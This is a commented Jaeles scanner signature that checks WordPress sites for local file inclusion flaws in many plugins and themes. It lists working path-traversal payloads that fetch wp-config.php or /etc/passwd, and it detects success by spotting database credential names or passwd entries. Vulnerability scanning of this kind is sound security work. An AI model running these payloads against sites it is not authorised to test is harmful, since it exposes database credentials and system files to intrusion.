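# Jaeles signature: probes a WordPress site for file-disclosure (LFI) endpoints in
# several plugins and themes. Each path in `vul` asks the endpoint for wp-config.php
# or /etc/passwd, and the detections look for tell-tale content in the response.
# NOTE(review): the id and the reference name CVE-2019-14205 only, while the path
# list spans many different plugins and themes; a match does not by itself say which
# issue applies, so triage on the matched URL in the scan output.
id: cve-2019-14205
info:
  name: Multiples Wordpress LFI
  risk: High

# jaeles scan -c 50 -s /path/to/this-sign.yaml -U list_urls.txt
# or assume wordpress app is under /blog/ URLs
# jaeles scan -c 50 -s /path/to/this-sign.yaml -u https://www.example.com -p 'root=https://www.example.com/blog'

params:
  # Base of the WordPress install; override with -p 'root=...' when it is not the site root.
  - root: '{{.BaseURL}}'

variables:
  # One candidate path per line. Presumably Jaeles expands a multi-line variable into
  # one request per line - confirm against the Jaeles documentation.
  - vul: |
      /wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
      /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
      /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php
      /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
      /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
      /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php
      /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php
      /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
      /wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php
      /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
      /?aam-media=wp-config.php
      /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
      /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
      /wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php
      /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd
      /wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php

requests:
  # NOTE(review): every path carries its parameters in the query string, yet the request
  # is sent as POST with no body visible here - confirm the method is intended.
  - method: POST
    redirect: false
    url: >-
      {{.root}}{{.vul}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      # wp-config.php was returned: both database setting names appear in a 200 response.
      # A match means database credentials were served; treat stored responses as secrets
      # and rotate the credentials once the finding is confirmed.
      - >-
        StatusCode() == 200 && StringSearch("response", 'DB_USER') && StringSearch("response", 'DB_PASSWORD')
      # /etc/passwd was returned: two account-line prefixes appear in a 200 response.
      - >-
        StatusCode() == 200 && StringSearch("response", 'root:') && StringSearch("response", 'bin:x:')

references:
  - https://www.cvebase.com/cve/2019/14205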